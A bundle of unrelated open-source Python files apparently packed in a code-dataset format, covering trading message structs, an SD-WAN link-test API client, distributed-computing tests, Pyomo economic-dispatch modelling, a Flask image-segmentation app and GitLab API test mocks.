'OrderStatus': lf.LfOrderStatusTypeMap,
'VolumeTraded': 'i',
'VolumeTotal': 'i',
'OffsetFlag': lf.LfOffsetFlagTypeMap,
},
'LFQryAccountField': {
'InvestorID': 'c19',
'BrokerID': 'c11',
},
'LFMarketDataField': {
'HighestPrice': 'd',
'BidPrice5': 'd',
'BidPrice4': 'd',
'BidPrice1': 'd',
'BidPrice3': 'd',
'BidPrice2': 'd',
'LowerLimitPrice': 'd',
'OpenPrice': 'd',
'AskPrice5': 'd',
'AskPrice4': 'd',
'AskPrice3': 'd',
'PreClosePrice': 'd',
'AskPrice1': 'd',
'PreSettlementPrice': 'd',
'AskVolume1': 'i',
'UpdateTime': 'c13',
'UpdateMillisec': 'i',
'BidVolume5': 'i',
'BidVolume4': 'i',
'BidVolume3': 'i',
'BidVolume2': 'i',
'PreOpenInterest': 'd',
'AskPrice2': 'd',
'Volume': 'i',
'AskVolume3': 'i',
'AskVolume2': 'i',
'AskVolume5': 'i',
'AskVolume4': 'i',
'UpperLimitPrice': 'd',
'BidVolume1': 'i',
'InstrumentID': 'c31',
'ClosePrice': 'd',
'ExchangeID': 'c9',
'TradingDay': 'c13',
'PreDelta': 'd',
'OpenInterest': 'd',
'CurrDelta': 'd',
'Turnover': 'd',
'LastPrice': 'd',
'SettlementPrice': 'd',
'ExchangeInstID': 'c64',
'LowestPrice': 'd',
},
'LFRspPositionField': {
'InstrumentID': 'c31',
'PosiDirection': lf.LfPosiDirectionTypeMap,
'HedgeFlag': lf.LfHedgeFlagTypeMap,
'YdPosition': 'i',
'InvestorID': 'c19',
'PositionCost': 'd',
'BrokerID': 'c11',
'Position': 'i',
},
'LFBarMarketDataField': {
'InstrumentID': 'c31',
'Volume': 'd',
'StartVolume': 'd',
'EndUpdateMillisec': 'i',
'High': 'd',
'TradingDay': 'c9',
'LowerLimitPrice': 'd',
'Low': 'd',
'UpperLimitPrice': 'd',
'Close': 'd',
'EndUpdateTime': 'c13',
'StartUpdateTime': 'c13',
'Open': 'd',
'StartUpdateMillisec': 'i',
},
'LFL2TradeField': {
'InstrumentID': 'c31',
'ExchangeID': 'c9',
'OrderKind': 'c2',
'OrderBSFlag': 'c2',
'Price': 'd',
'Volume': 'd',
'TradeTime': 'c9',
},
'LFOrderActionField': {
'InstrumentID': 'c31',
'ExchangeID': 'c11',
'ActionFlag': 'c',
'KfOrderID': 'i',
'UserID': 'c16',
'LimitPrice': 'd',
'OrderRef': 'c21',
'InvestorID': 'c19',
'VolumeChange': 'i',
'BrokerID': 'c11',
'RequestID': 'i',
'OrderSysID': 'c31',
},
}
MsgType2LFStruct = {
lf.MsgTypes.MD: LFMarketDataField,
lf.MsgTypes.L2_MD: LFL2MarketDataField,
lf.MsgTypes.L2_INDEX: LFL2IndexField,
lf.MsgTypes.L2_ORDER: LFL2OrderField,
lf.MsgTypes.L2_TRADE: LFL2TradeField,
lf.MsgTypes.BAR_MD: LFBarMarketDataField,
lf.MsgTypes.QRY_POS: LFQryPositionField,
lf.MsgTypes.RSP_POS: LFRspPositionField,
lf.MsgTypes.ORDER: LFInputOrderField,
lf.MsgTypes.RTN_ORDER: LFRtnOrderField,
lf.MsgTypes.RTN_TRADE: LFRtnTradeField,
lf.MsgTypes.ORDER_ACTION: LFOrderActionField,
lf.MsgTypes.QRY_ACCOUNT: LFQryAccountField,
lf.MsgTypes.RSP_ACCOUNT: LFRspAccountField,
}
MsgType2LFStruct.update(SnifferMsgType2Struct)
LFStruct2MsgType = {
LFMarketDataField: lf.MsgTypes.MD,
LFL2MarketDataField: lf.MsgTypes.L2_MD,
LFL2IndexField: lf.MsgTypes.L2_INDEX,
LFL2OrderField: lf.MsgTypes.L2_ORDER,
LFL2TradeField: lf.MsgTypes.L2_TRADE,
LFBarMarketDataField: lf.MsgTypes.BAR_MD,
LFQryPositionField: lf.MsgTypes.QRY_POS,
LFRspPositionField: lf.MsgTypes.RSP_POS,
LFInputOrderField: lf.MsgTypes.ORDER,
LFRtnOrderField: lf.MsgTypes.RTN_ORDER,
LFRtnTradeField: lf.MsgTypes.RTN_TRADE,
LFOrderActionField: lf.MsgTypes.ORDER_ACTION,
LFQryAccountField: lf.MsgTypes.QRY_ACCOUNT,
LFRspAccountField: lf.MsgTypes.RSP_ACCOUNT,
}
| 1.914063 | 2 |
pyedgeconnect/orch/_link_integrity.py | SPOpenSource/edgeconnect-python | 15 | 12761003 | <reponame>SPOpenSource/edgeconnect-python
# MIT License
# (C) Copyright 2021 Hewlett Packard Enterprise Development LP.
#
# linkIntegrity : Link integrity and bandwidth test
def get_link_integrity_test_result(
self,
ne_id: str,
) -> dict:
"""Retrieve current link integrity test status/results from
appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - linkIntegrity
- GET
- /linkIntegrityTest/status/{neId}
:param ne_id: Appliance id in the format of integer.NE e.g. ``3.NE``
:type ne_id: str
:return: Returns dictionary of test status and related results
:rtype: dict
"""
return self._get("/linkIntegrityTest/status/{}".format(ne_id))
def update_user_defined_app_port_protocol(
self,
ne_pk_1: str,
bandwidth_1: str,
path_1: str,
ne_pk_2: str,
bandwidth_2: str,
path_2: str,
duration: int,
test_program: str,
dscp: str = "any",
) -> bool:
"""Start a link integrity test between two appliances using
specified parameters
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - linkIntegrity
- POST
- /linkIntegrityTest/run
:param ne_pk_1: Network Primary Key (nePk) of first appliance
:type ne_pk_1: str
:param bandwidth_1: Data transfer rate to use from first appliance
:type bandwidth_1: str
:param path_1: Traffic path for first appliance. Can have values of
"pass-through", "pass-through-unshaped" or "{tunnelID}"
e.g. "tunnel_1".
:type path_1: str
:param ne_pk_2: Network Primary Key (nePk) of second appliance
:type ne_pk_2: str
:param bandwidth_2: Data transfer rate to use from second appliance
:type bandwidth_2: str
:param path_2: Traffic path for first appliance. Can have values of
"pass-through", "pass-through-unshaped" or "{tunnelID}"
e.g. "tunnel_1".
:type path_2: str
:param duration: Duration of test in seconds
:type duration: int
:param test_program: Test program to be used for this test. Can have
values of "iperf" or "tcpperf"
:type test_program: str
:param dscp: DSCP value for test traffic, defaults to "any"
:type dscp: str, optional
:return: Returns True/False based on successful call
:rtype: bool
"""
data = {
"appA": {"nePk": ne_pk_1, "bandwidth": bandwidth_1, "path": path_1},
"appB": {"nePk": ne_pk_2, "bandwidth": bandwidth_2, "path": path_2},
"duration": duration,
"testProgram": test_program,
"DSCP": dscp,
}
return self._post("/linkIntegrityTest/run", data=data, return_type="bool")
| 2.421875 | 2 |
compss/programming_model/bindings/python/src/pycompss/tests/functions/test_reduce.py | eflows4hpc/compss | 31 | 12761004 | <gh_stars>10-100
#!/usr/bin/python
#
# Copyright 2002-2021 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
def test_merge_reduce():
from pycompss.functions.reduce import merge_reduce
data = list(range(11))
def accumulate(a, b):
return a + b
result = merge_reduce(accumulate, data)
assert result == 55, "ERROR: Got unexpected result with merge_reduce."
def test_merge_n_reduce():
from pycompss.functions.reduce import merge_n_reduce
data = list(range(11))
def accumulate(*args):
return sum(args)
result = merge_n_reduce(accumulate, 5, data)
assert result == 55, "ERROR: Got unexpected result with merge_n_reduce."
| 2.671875 | 3 |
src/Models.py | wengzehang/deformable_rigid_interaction_prediction | 9 | 12761005 | from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, \
GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction
# Define a model specification which can be instantiated
def specify_input_graph_format() -> GraphAttributeFormat:
return GraphAttributeFormat(
node_format=NodeFormat.XYZR_FixedFlag,
edge_format=EdgeFormat.DiffXYZ_ConnectionFlag,
global_format=GlobalFormat.NextEndEffectorXYZR,
)
def specify_position_output_graph_format() -> GraphAttributeFormat:
return GraphAttributeFormat(
node_format=NodeFormat.XYZ,
edge_format=EdgeFormat.DiffXYZ,
global_format=GlobalFormat.Dummy
)
def specify_has_moved_output_graph_format() -> GraphAttributeFormat:
return GraphAttributeFormat(
node_format=NodeFormat.HasMovedClasses,
edge_format=EdgeFormat.Dummy,
global_format=GlobalFormat.Dummy
)
def specify_cloth_keypoints_for_bag() -> ClothKeypoints:
return ClothKeypoints(
keypoint_indices=[
# Front
4, 127, 351, 380, 395, 557, 535, 550, 756, 783, 818, 1258,
# Back
150, 67, 420, 436, 920, 952, 1069, 1147, 1125, 1099, 929, 464,
# Left
142, 851, 1178,
# Right
49, 509, 1000,
# Bottom
641
],
keypoint_edges=[
# Front edges
(4, 351), (4, 1258),
(351, 380), (351, 818),
(380, 395), (380, 783),
(395, 756),
(127, 557), (127, 1258),
(557, 818), (557, 535),
(535, 783), (535, 550),
(550, 756),
(783, 818),
(818, 1258),
# Back edges
(436, 1069), (436, 420),
(1069, 952),
(952, 920),
(420, 1099), (420, 464),
(1099, 920), (1099, 1125),
(920, 929),
(464, 1125), (464, 67),
(1125, 929), (1125, 1147),
(67, 1147),
(150, 1147), (150, 929),
# Left edges
(920, 1178),
(1178, 535), (1178, 851),
(150, 142),
(851, 557), (851, 142), (851, 929),
(142, 127),
# Right edges
(509, 380), (509, 420), (509, 1000),
(1000, 351), (1000, 464), (1000, 49),
(49, 4), (49, 67),
# Bottom edges
(641, 127), (641, 4),
(641, 67), (641, 150),
],
fixed_keypoint_indices=[395, 550, 756, 436, 952, 1069]
)
def specify_graph_net_structure() -> GraphNetStructure:
return GraphNetStructure(
encoder_node_layers=[64, 64],
encoder_edge_layers=[64, 64],
encoder_global_layers=[128],
core_node_layers=[128, 64],
core_edge_layers=[128, 64],
core_global_layers=[128],
num_processing_steps=5,
)
def specify_training_params() -> TrainingParams:
return TrainingParams(
frame_step=1,
movement_threshold=0.001,
batch_size=32,
)
def specify_motion_model(name: str) -> ModelSpecification:
return ModelSpecification(
name=name,
input_graph_format=specify_input_graph_format(),
output_graph_format=specify_position_output_graph_format(),
position_frame=PositionFrame.LocalToEndEffector,
graph_net_structure=specify_graph_net_structure(),
loss_function=LossFunction.MeanSquaredError_Position_NodesOnly,
cloth_keypoints=specify_cloth_keypoints_for_bag(),
training_params=specify_training_params(),
)
def specify_has_moved_model(name: str) -> ModelSpecification:
return ModelSpecification(
name=name,
input_graph_format=specify_input_graph_format(),
output_graph_format=specify_has_moved_output_graph_format(),
position_frame=PositionFrame.LocalToEndEffector,
graph_net_structure=specify_graph_net_structure(),
loss_function=LossFunction.CrossEntropy,
cloth_keypoints=specify_cloth_keypoints_for_bag(),
training_params=specify_training_params(),
)
| 2.3125 | 2 |
copyright_updater/erase.py | swasun/copyright-updater | 0 | 12761006 | #####################################################################################
# MIT License #
# #
# Copyright (C) 2018 <NAME> #
# #
# This file is part of copyright-updater. #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
#####################################################################################
from .console_logger import ConsoleLogger
from .copyright import Copyright
from .comment_parameters import CommentParameters
from .comment import comment_copyright
from .find import find_copyright, is_copyright_exist
from shutil import copyfile
import os
def erase_copyright(target_file_name, with_backup):
with open(target_file_name, 'r') as f:
file_lines = f.readlines()
try:
copyright = find_copyright(file_lines)
except:
ConsoleLogger.status('No copyright detected in ' + target_file_name + ' - skipping.')
return True
with open(target_file_name, 'r') as target_file:
target_content = target_file.read()
if with_backup:
copyfile(target_file_name, target_file_name + '.backup')
os.remove(target_file_name)
with open(target_file_name, 'w') as new_file:
copyright_content = ''.join(copyright.lines)
new_content = target_content.replace(copyright_content + '\n' + '\n', '')
new_content = new_content.replace(copyright_content + '\n', '')
new_content = new_content.replace(copyright_content, '')
new_file.write(new_content)
ConsoleLogger.success('Copyright erased in ' + target_file_name)
return True | 1.367188 | 1 |
economic_dispatch/model/bus.py | simcesplatform/economic-dispatch | 0 | 12761007 | # -*- coding: utf-8 -*-
# Copyright 2021 Tampere University and VTT Technical Research Centre of Finland
# This software was developed as a part of the ProCemPlus project: https://www.senecc.fi/projects/procemplus
# This source code is licensed under the MIT license. See LICENSE in the repository root directory.
# Author(s): <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
"""
Contains class for Bus.
"""
import pyomo.environ as pyo
from economic_dispatch.model.units.base import _Unit
from economic_dispatch.model.factory import UnitFactory
def _get_index(name, from_list):
for index, u in enumerate(from_list):
if u.name == name:
return index
return None
class Bus:
"""
Bus containing all units related to this bus
...
Attributes
----------
name: str
name of the bus
units: dict
key: unit name, value: unit object
unit_names: list
list of unit names
Methods
-------
block_rule(block: pyo.Block)
Builds all the optimisation model components for this unit type
on top of the passed block.
topics(prefix: bool=True)
returns a list of network's units' problem instance parameter names,
if prefix=True '{unit.name}.' is added before attribute names.
add(unit: _Unit)
add unit to bus
remove(name: str)
remove unit from bus
"""
def __init__(self, name, units=None):
"""
Parameters
----------
name: str
name of the bus
units: List
list of all unit objects related to this bus
"""
if units is None:
units = []
self.name = name
self._units = units
def __repr__(self):
return self.__class__.__name__ + '(units=' + str(list(self.unit_names)) + ')'
def add(self, unit):
""" Adds unit to bus. """
if isinstance(unit, _Unit):
self._units.append(unit)
else:
raise ValueError("Input unit is not valid")
def remove(self, name):
""" Removes unit from bus. """
if name in self.unit_names:
self._units.pop(_get_index(name, self._units))
def topics(self, prefix=True):
""" Return a list of bus's units' problem instance parameter names.
If prefix=True '{unit.name}.' is added before attribute names.
"""
return [t for u in self._units for t in u.topics(prefix=prefix)]
@property
def units(self):
""" Dictionary with unit names as keys and unit objects as values. """
return {u.name: u for u in self._units}
@property
def unit_names(self):
""" List of unit names. """
return list(self.units.keys())
def clear(self):
""" Sets problem instance parameter values of units to None. """
for unit in self._units:
unit.clear()
def ready(self):
""" Returns True if all problem instance parameter values are ready for all units. """
return all(unit.ready() for unit in self._units)
def block_rule(self, block):
"""
Builds all the optimisation model components for this bus
on top of the passed block.
The underlying model should have its time index set at attr T
Parameters
----------
block: pyo.Block
bus level block of the model.
"""
model = block.model()
network = block.parent_block()
def U_init(b):
return self.unit_names
block.U = pyo.Set(initialize=U_init)
# Block rules to units
def unit_rule(b, i):
self.units[i].block_rule(b)
block.Units = pyo.Block(block.U, rule=unit_rule)
# Optimized units
def controllable_init(b):
return [u for u in b.U if hasattr(b.Units[u], 'dispatch')]
block.C = pyo.Set(initialize=controllable_init)
# Total real power injection to bus
def inj_rule(b, i):
return sum(network.icd_matrix[self.name, line] * network.Lines[line].power_flow[i]
for line in network.L)
block.net_injection = pyo.Expression(model.T, rule=inj_rule)
# Dispatches minus electrical loads
def rp_rule(b, i):
return sum(b.Units[u].real_power[i] for u in b.U)
block.real_power = pyo.Expression(model.T, rule=rp_rule)
# Power balance constraint
def demand_rule(b, i):
return b.real_power[i] == b.net_injection[i]
block.demand_balance = pyo.Constraint(model.T, rule=demand_rule)
# Cost
def op_cost_rule(b, i):
return sum(b.Units[u].operational_cost[i] for u in b.U)
block.operational_cost = pyo.Expression(model.T, rule=op_cost_rule)
# Cost
def cost_rule(b, i):
return sum(b.Units[u].cost[i] for u in b.U)
block.cost = pyo.Expression(model.T, rule=cost_rule)
@classmethod
def from_json(cls, json_bus):
""" Creates a Bus from dictionary and returns it. """
json_units = json_bus.get("units")
units = []
for json_unit in json_units:
unit = UnitFactory.make_component(**json_unit)
units.append(unit)
json_bus["units"] = units
bus = Bus(**json_bus)
return bus | 2.484375 | 2 |
eha/apps/users/schema/mutations/user_mutations.py | Niyitangasam/e-ha-backend | 0 | 12761008 | <filename>eha/apps/users/schema/mutations/user_mutations.py
import graphene
from eha.users.models import User
from eha.users.schema.types.user_type import UserType
class CreateUser(graphene.Mutation):
"""
Mutation to create a new user
"""
user = graphene.Field(UserType)
class Arguments:
username = graphene.String(required=True)
email = graphene.String(required=True)
mobile_number = graphene.String(required=True)
profile_image = graphene.String()
password = graphene.String(required=True)
success = graphene.List(graphene.String)
errors = graphene.List(graphene.String)
def mutate(self, info, **kwargs):
try:
user = User.objects.create_user(**kwargs)
success = ['You have successfully registered']
return CreateUser(success=success, user=user)
except Exception as e:
errors = ["Something went wrong: {}".format(e)]
return CreateUser(errors=errors) | 2.484375 | 2 |
Flask/app.py | fjzs/Segmentor | 0 | 12761009 | from datetime import datetime
from flask import Flask, request, render_template
from inference import get_category,save_image
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def fragment():
# Write the GET Method to get the index file
if request.method == 'GET':
return render_template('index.html')
# Write the POST Method to post the results file
if request.method == 'POST':
print(request.files)
if 'file' not in request.files:
print('File Not Uploaded')
return
# Read file from upload
file = request.files['file']
save_image(file,"input")
# Get category of prediction
model1 = 'modelDeepLabV3_Mila.tflite'
model2 = 'lite-model_deeplabv3-xception65_1_default_2.tflite'
model3 = 'lite-model_mobilenetv2-coco_dr_1.tflite'
get_category(img=file, model =model1 ) #saves output as image in static folder
get_category(img=file, model =model2 )
get_category(img=file, model =model3 )
#from flask import Response
return render_template('result.html', model1=model1, model2=model2, model3=model3)
#Response(category.getvalue(), mimetype='image/png')
if __name__ == '__main__':
# app.run(debug=True)
app.run(port=33507, debug=True) #set to port 33507 so it runs in heroku
| 2.609375 | 3 |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/source_control/gitlab/gitlab.py | tr3ck3r/linklight | 0 | 12761010 | # -*- coding: utf-8 -*-
# Copyright: (c) 2019, <NAME> (<EMAIL>)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import
import sys
from httmock import response # noqa
from httmock import urlmatch # noqa
from ansible_collections.community.general.tests.unit.compat import unittest
from gitlab import Gitlab
class FakeAnsibleModule(object):
def __init__(self):
self.check_mode = False
def fail_json(self, **args):
pass
def exit_json(self, **args):
pass
class GitlabModuleTestCase(unittest.TestCase):
def setUp(self):
unitest_python_version_check_requirement(self)
self.mock_module = FakeAnsibleModule()
self.gitlab_instance = Gitlab("http://localhost", private_token="private_token", api_version=4)
# Python 2.7+ is needed for python-gitlab
GITLAB_MINIMUM_PYTHON_VERSION = (2, 7)
# Verify if the current Python version is higher than GITLAB_MINIMUM_PYTHON_VERSION
def python_version_match_requirement():
return sys.version_info >= GITLAB_MINIMUM_PYTHON_VERSION
# Skip unittest test case if python version don't match requirement
def unitest_python_version_check_requirement(unittest_testcase):
if not python_version_match_requirement():
unittest_testcase.skipTest("Python %s+ is needed for python-gitlab" % ",".join(map(str, GITLAB_MINIMUM_PYTHON_VERSION)))
'''
USER API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users", method="get")
def resp_find_user(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1, "username": "john_smith", "name": "<NAME>", "state": "active",'
'"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
'"web_url": "http://localhost:3000/john_smith"}, {"id": 2,'
'"username": "jack_smith", "name": "<NAME>", "state": "blocked",'
'"avatar_url": "http://gravatar.com/../e32131cd8.jpeg",'
'"web_url": "http://localhost:3000/jack_smith"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users", method="post")
def resp_create_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "john_smith", "name": "<NAME>", "state": "active",'
'"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
'"web_url": "http://localhost:3000/john_smith","created_at": "2012-05-23T08:00:58Z",'
'"bio": null, "location": null, "public_email": "<EMAIL>", "skype": "",'
'"linkedin": "", "twitter": "", "website_url": "", "organization": ""}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="get")
def resp_get_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "john_smith", "name": "<NAME>",'
'"state": "active",'
'"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
'"web_url": "http://localhost:3000/john_smith",'
'"created_at": "2012-05-23T08:00:58Z", "bio": null, "location": null,'
'"public_email": "<EMAIL>", "skype": "", "linkedin": "",'
'"twitter": "", "website_url": "", "organization": "", "is_admin": false}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="get")
def resp_get_missing_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(404, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_missing_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(404, content, headers, None, 5, request)
'''
USER SSHKEY API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1/keys", method="get")
def resp_get_user_keys(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1, "title": "Public key",'
'"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596'
'k6YjzGGphH2TUxwKzxcKDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQa'
'SeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
'"created_at": "2014-08-01T14:47:39.080Z"},{"id": 3,'
'"title": "Another Public key",'
'"key": "ssh-rsa <KEY>'
'<KEY>'
'eP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
'"created_at": "2014-08-01T14:47:39.080Z"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1/keys", method="post")
def resp_create_user_keys(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "title": "Private key",'
'"key": "ssh-rsa <KEY>'
'szUJzYPPUSRAX3BCgTqLqYx//UuVncK7YqLVSbbwjKR2Ez5lISgCnVfLVEXzwhv+xawxKWmI7hJ5S0tOv6MJ+Ixy'
'Ta4xcKwJTwB86z22n9fVOQeJTR2dSOH1WJrf0PvRk+KVNY2jTiGHTi9AIjLnyD/jWRpOgtdfkLRc8EzAWrWlgNmH'
'2WOKBw6za0az6XoG75obUdFVdW3qcD0xc809OHLi7FDf+E7U4wiZJCFuUizMeXyuK/SkaE1aee4Qp5R4dxTR4TP9'
'M1XAYkf+kF0W9srZ+mhF069XD/zhUPJsvwEF",'
'"created_at": "2014-08-01T14:47:39.080Z"}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
'''
GROUP API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="get")
def resp_find_group(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1, "name": "Foobar Group", "path": "foo-bar",'
'"description": "An interesting group", "visibility": "public",'
'"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
'"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
'"full_name": "Foobar Group", "full_path": "foo-bar",'
'"file_template_project_id": 1, "parent_id": null, "projects": []}, {"id": 2, "name": "BarFoo Group", "path": "bar-foor",'
'"description": "An interesting group", "visibility": "public",'
'"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/2/bar.jpg",'
'"web_url": "http://localhost:3000/groups/bar-foo", "request_access_enabled": false,'
'"full_name": "BarFoo Group", "full_path": "bar-foo",'
'"file_template_project_id": 1, "parent_id": null, "projects": []}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1", method="get")
def resp_get_group(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "name": "Foobar Group", "path": "foo-bar",'
'"description": "An interesting group", "visibility": "public",'
'"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
'"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
'"full_name": "Foobar Group", "full_path": "foo-bar",'
'"file_template_project_id": 1, "parent_id": null, "projects": [{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git<EMAIL>:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}]}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1", method="get")
def resp_get_missing_group(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(404, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="post")
def resp_create_group(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "name": "<NAME>", "path": "foo-bar",'
'"description": "An interesting group", "visibility": "public",'
'"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
'"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
'"full_name": "Foobar Group", "full_path": "foo-bar",'
'"file_template_project_id": 1, "parent_id": null}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="post")
def resp_create_subgroup(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 2, "name": "BarFoo Group", "path": "bar-foor",'
'"description": "An interesting group", "visibility": "public",'
'"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/2/bar.jpg",'
'"web_url": "http://localhost:3000/groups/foo-bar/bar-foo", "request_access_enabled": false,'
'"full_name": "BarFoo Group", "full_path": "foo-bar/bar-foo",'
'"file_template_project_id": 1, "parent_id": 1}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_group(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
'''
GROUP MEMBER API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members/1", method="get")
def resp_get_member(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "raymond_smith", "name": "<NAME>", "state": "active",'
'"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
'"web_url": "http://19172.16.58.3:3000/root", "expires_at": "2012-10-22T14:13:35Z", "access_level": 30}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members", method="get")
def resp_find_member(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1, "username": "raymond_smith", "name": "<NAME>", "state": "active",'
'"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
'"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z", "access_level": 30},{'
'"id": 2, "username": "john_doe", "name": "<NAME>","state": "active",'
'"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
'"web_url": "http://192.168.1.8:3000/root","expires_at": "2012-10-22T14:13:35Z",'
'"access_level": 30}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members", method="post")
def resp_add_member(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "raymond_smith", "name": "<NAME>",'
'"state": "active",'
